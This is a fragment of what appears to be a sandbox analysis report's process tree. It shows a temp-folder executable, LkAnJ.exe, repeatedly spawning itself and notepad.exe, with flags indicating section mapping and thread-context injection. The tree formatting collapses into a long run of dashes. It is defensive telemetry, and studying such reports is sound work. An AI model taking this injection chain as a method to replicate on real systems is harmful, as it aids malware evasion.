C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"113⤵PID:1724
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"113⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2144 150525113⤵PID:2136
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"114⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2056 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"115⤵PID:2120
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"115⤵PID:2192
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2192 151788115⤵PID:2128
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"116⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2172 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"117⤵PID:2196
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"117⤵PID:2284
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2284 153395117⤵PID:2308
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"118⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2268 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"119⤵PID:2488
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"119⤵PID:2484
-
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2484 154815119⤵PID:2516
-
C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"120⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetThreadContext
PID:2568 -
C:\Windows\SysWOW64\notepad.exe"C:\Windows\system32\notepad.exe"121⤵PID:2552
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-